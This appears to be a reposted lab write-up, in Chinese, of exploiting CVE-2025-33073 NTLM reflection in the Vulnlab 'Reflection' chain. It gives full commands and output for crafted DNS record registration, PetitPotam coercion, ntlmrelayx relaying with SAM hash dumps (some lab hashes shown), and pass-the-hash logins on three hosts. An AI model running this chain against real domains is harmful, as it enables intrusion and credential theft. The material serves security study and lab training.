使用 NTLM 反射进行 Pwning 反射

admin 2025年6月19日23:16:36评论16 views字数 14551阅读48分30秒阅读模式
使用 NTLM 反射进行 Pwning 反射

这篇文章仅演示了该攻击过程。关于“反射”攻击链的详细说明,我已经创建了一个,您可以在这里找到:https://seriotonctf.github.io/Reflection-Vulnlab/

Synacktiv 最近发布了一篇关于 CVE-2025-33073(NTLM 反射攻击)的博客文章。在本文中,我将演示如何在 Vulnlab 的“反射”链中利用此漏洞。如需深入分析,请参阅Synacktiv 的原始博客文章。

状况

此次攻击要想成功,必须满足以下条件:

  • 必须在目标上禁用 SMB 签名

  • 攻击者必须拥有创建 DNS 记录的权限

攻击

首先,我们需要检查目标是否禁用了 SMB 签名

➜ nxcsmbtargets.txtSMB10.10.163.39445WS01[*]Windows10 / Server2019Build19041x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)SMB10.10.163.37445DC01[*]WindowsServer2022Build20348x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)SMB10.10.163.38445MS01[*]WindowsServer2022Build20348x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)Runningnxcagainst3targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100%0:00:00

signing:False etexec 确认这三台目标机器均未强制执行 SMB 签名( ),因此它们可能容易受到此攻击

注册 DNS 记录

我们需要注册一个新的 DNS 记录,在本例中localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,让它指向我们的 IP 地址

➜ dnstool.py -u 'reflection.vlabbie.smith' -p '<REDACTED>'10.10.163.37 -a add -d 10.8.0.210 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'[-] Connecting to host...[-] Binding to host[+] Bind OK[-] Adding new record[+] LDAP operation completed successfully

或者,我们可以使用我们想要利用的机器的主机名创建一个新的 DNS 记录,例如,DC01

➜ dnstool.py -u 'reflection.vlabbie.smith' -p '<REDACTED>'10.10.163.37 -a add -d 10.8.0.210 -r 'DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'[-] Connecting to host...[-] Binding to host[+] Bind OK[-] Adding new record[+] LDAP operation completed successfully

让我们验证一下 DNS 记录是否已创建并指向攻击者的 IP 地址

➜ dnstool.py -u'reflection.vlabbie.smith' -p'<REDACTED>'10.10.163.37 -a query -d 10.8.0.210 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'[-] Connecting to host...[-] Binding to host[+] Bind OK[+] Found record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAADC=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=reflection.vl,CN=MicrosoftDNS,DC=DomainDnsZones,DC=reflection,DC=vl[+] Record entry: - Type: 1 (A) (Serial:90) - Address:10.8.0.210

或者,我们可以使用dig命令

➜ diglocalhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl; <<>> DiG 9.18.30-0ubuntu0.24.04.2-Ubuntu <<>> localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl;; globaloptions: +cmd;; Gotanswer:;; ->>HEADER<<-opcodeQUERYstatusNOERRORid: 20625;; flagsqraardraQUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPTPSEUDOSECTION:EDNSversion: 0, flags:; udp: 4000;; QUESTIONSECTION:;localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vlINA;; ANSWERSECTION:localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. 180 INA 10.8.0.210;; Querytime: 63 msec;; SERVER: 10.10.163.37#53(DC01.reflection.vl) (UDP);; WHENSunJun 15 15:28:07CET 2025;; MSGSIZErcvd: 112
➜ digDC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl; <<>> DiG 9.18.30-0ubuntu0.24.04.2-Ubuntu <<>> DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl;; globaloptions: +cmd;; Gotanswer:;; ->>HEADER<<-opcodeQUERYstatusNOERRORid: 13727;; flagsqraardraQUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPTPSEUDOSECTION:EDNSversion: 0, flags:; udp: 4000;; QUESTIONSECTION:;DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vlINA;; ANSWERSECTION:DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. 180 INA 10.8.0.210;; Querytime: 62 msec;; SERVER: 10.10.163.37#53(DC01.reflection.vl) (UDP);; WHENSunJun 15 15:34:06CET 2025;; MSGSIZErcvd: 156

强迫

现在,我们只需要强制对之前创建的 DNS 记录进行身份验证

➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.reflection.vl              ___ _ _ _ ___ _             | _  ___ | |_ (_) | |_ | _  ___ | |_ __ _ _ __             | _/ / -_) | _| | | | _| | _/  / _  | _| / _` | | '             _|_|_ ___| ___| _|_|_ ___| _|_|_ ___/   ___| __,_| |_|_|_|          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'              PoC to elicit machine account authentication via some MS-EFSRPC functions                                      by topotam (@topotam77)                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRNTrying pipe lsarpc[-] Connecting to ncacn_np:DC01.reflection.vl[PIPElsarpc][+] Connected![+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e[+] Successfully bound![-] Sending EfsRpcOpenFileRaw![-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED![+] OK! Using unpatched function![-] Sending EfsRpcEncryptFileSrv![+] Got expected ERROR_BAD_NETPATH exception!![+] Attack worked!
使用 NTLM 反射进行 Pwning 反射

我们还可以使用coerce_plusNetexec 的模块

➜ nxc smb DC01.reflection.vl -u abbie.smith -p'<REDACTED>' -M coerce_plus -o METHOD=Petitpotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAASMB 10.10.201.85445    DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)SMB 10.10.201.85445    DC01 [+] reflection.vlabbie.smith:<REDACTED>COERCE_PLUS 10.10.201.85445    DC01 VULNERABLE, PetitPotamCOERCE_PLUS 10.10.201.85445    DC01 Exploit Success, lsarpcEfsRpcAddUsersToFile

攻击奏效

如你所见,攻击成功了,我们能够执行 SAM 转储,因为 SYSTEM 令牌用于身份验证

➜ ntlmrelayx.py -t "smb://DC01.reflection.vl" -smb2supportImpacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies[*] Protocol Client IMAP loaded..[*] Protocol Client IMAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client RPC loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client DCSYNC loaded..[*] Protocol Client SMB loaded..[*] Protocol Client MSSQL loaded..[*] Running in relay mode to single host[*] Setting up SMB Server on port 445[*] Setting up HTTP Server on port 80[*] Setting up WCF Server on port 9389[*] Setting up RAW Server on port 6666[*] Multirelay disabled[*] Servers started, waiting for connections[*] SMBD-Thread-5 (process_request_thread): Received connection from10.10.163.37, attacking target smb://DC01.reflection.vl[*] Authenticating against smb://DC01.reflection.vl as / SUCCEED[*] SMBD-Thread-7 (process_request_thread): Received connection from10.10.163.37, attacking target smb://DC01.reflection.vl[*] Service RemoteRegistry isin stopped state[*] Authenticating against smb://DC01.reflection.vl as / SUCCEED[*] Starting service RemoteRegistry[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd[*Dumping local SAM hashes (uid:rid:lmhash:nthash)[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[*] Done dumping SAM hashes for host: dc01.reflection.vl[*] Done dumping SAM hashes for host: dc01.reflection.vl[*] Stopping service RemoteRegistry
使用 NTLM 反射进行 Pwning 反射
➜ nxcsmbDC01.reflection.vl-u administrator -H <REDACTED>SMB         10.10.163.37    445 DC01[*]WindowsServer 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)SMB         10.10.163.37    445 DC01[+]reflection.vladministrator:<REDACTED> (Pwn3d!)

以同样的方式,我们可以瞄准MS01并WS01

MS01

➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA ms01.reflection.vl              ___ _ _ _ ___ _             | _  ___ | |_ (_) | |_ | _  ___ | |_ __ _ _ __             | _/ / -_) | _| | | | _| | _/  / _  | _| / _` | | '             _|_|_ ___| ___| _|_|_ ___| _|_|_ ___/   ___| __,_| |_|_|_|          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'              PoC to elicit machine account authentication via some MS-EFSRPC functions                                      by topotam (@topotam77)                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRNTrying pipe lsarpc[-] Connecting to ncacn_np:ms01.reflection.vl[PIPElsarpc][+] Connected![+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e[+] Successfully bound![-] Sending EfsRpcOpenFileRaw![-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED![+] OK! Using unpatched function![-] Sending EfsRpcEncryptFileSrv![+] Got expected ERROR_BAD_NETPATH exception!![+] Attack worked!
➜ ntlmrelayx.py -t "smb://MS01.reflection.vl" -smb2supportImpacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies[*] Protocol Client IMAPS loaded..[*] Protocol Client IMAP loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client RPC loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client DCSYNC loaded..[*] Protocol Client SMB loaded..[*] Protocol Client MSSQL loaded..[*] Running in relay mode to single host[*] Setting up SMB Server on port 445[*] Setting up HTTP Server on port 80[*] Setting up WCF Server on port 9389[*] Setting up RAW Server on port 6666[*] Multirelay disabled[*] Servers started, waiting for connections[*] SMBD-Thread-5 (process_request_thread): Received connection from10.10.163.38, attacking target smb://MS01.reflection.vl[*] Authenticating against smb://MS01.reflection.vl as / SUCCEED[*] SMBD-Thread-7 (process_request_thread): Received connection from10.10.163.38, attacking target smb://MS01.reflection.vl[*] Service RemoteRegistry isin stopped state[*] Authenticating against smb://MS01.reflection.vl as / SUCCEED[*] Starting service RemoteRegistry[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee[*Dumping local SAM hashes (uid:rid:lmhash:nthash)[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::[*] Done dumping SAM hashes for host: ms01.reflection.vllabadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::[*] Done dumping SAM hashes for host: ms01.reflection.vl[*] Stopping service RemoteRegistry
➜ nxcsmbMS01.reflection.vl-uadministrator-H <REDACTED--local-authSMB         10.10.163.38    445 MS01[*]WindowsServer 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)SMB         10.10.163.38    445 MS01[+]MS01administrator:<REDACTED> (Pwn3d!)

WS01

➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA WS01.reflection.vl              ___ _ _ _ ___ _             | _  ___ | |_ (_) | |_ | _  ___ | |_ __ _ _ __             | _/ / -_) | _| | | | _| | _/  / _  | _| / _` | | '             _|_|_ ___| ___| _|_|_ ___| _|_|_ ___/   ___| __,_| |_|_|_|          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'              PoC to elicit machine account authentication via some MS-EFSRPC functions                                      by topotam (@topotam77)                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRNTrying pipe lsarpc[-] Connecting to ncacn_np:WS01.reflection.vl[PIPElsarpc][+] Connected![+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e[+] Successfully bound![-] Sending EfsRpcOpenFileRaw![-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED![+] OK! Using unpatched function![-] Sending EfsRpcEncryptFileSrv![+] Got expected ERROR_BAD_NETPATH exception!![+] Attack worked!
➜ ntlmrelayx.py -t "smb://WS01.reflection.vl" -smb2supportImpacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies[*] Protocol Client IMAPS loaded..[*] Protocol Client IMAP loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client RPC loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client DCSYNC loaded..[*] Protocol Client SMB loaded..[*] Protocol Client MSSQL loaded..[*] Running in relay mode to single host[*] Setting up SMB Server on port 445[*] Setting up HTTP Server on port 80[*] Setting up WCF Server on port 9389[*] Setting up RAW Server on port 6666[*] Multirelay disabled[*] Servers started, waiting for connections[*] SMBD-Thread-5 (process_request_thread): Received connection from10.10.163.39, attacking target smb://WS01.reflection.vl[*] Authenticating against smb://WS01.reflection.vl as / SUCCEED[*] SMBD-Thread-7 (process_request_thread): Received connection from10.10.163.39, attacking target smb://WS01.reflection.vl[*] Service RemoteRegistry isin stopped state[*] Authenticating against smb://WS01.reflection.vl as / SUCCEED[*] Service RemoteRegistry is disabled, enabling it[*] Starting service RemoteRegistry[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f[*Dumping local SAM hashes (uid:rid:lmhash:nthash)[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::labadm:1001:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::[*] Done dumping SAM hashes for host: ws01.reflection.vllabadm:1001:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::[*] Done dumping SAM hashes for host: ws01.reflection.vl[*] Stopping service RemoteRegistry[*] Restoring the disabled state for service RemoteRegistry
➜ nxc smb WS01.reflection.vl -u administrator -H <REDACTED> --local-authSMB 10.10.163.39445    WS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:WS01) (signing:False) (SMBv1:False)SMB 10.10.163.39445    WS01 [+] WS01administrator:<REDACTED> (Pwn3d!)

资源

https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073

https://github.com/mverschu/CVE-2025-33073

原文始发于微信公众号(Ots安全):使用 NTLM 反射进行 Pwning 反射

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月19日23:16:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用 NTLM 反射进行 Pwning 反射https://cn-sec.com/archives/4178707.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息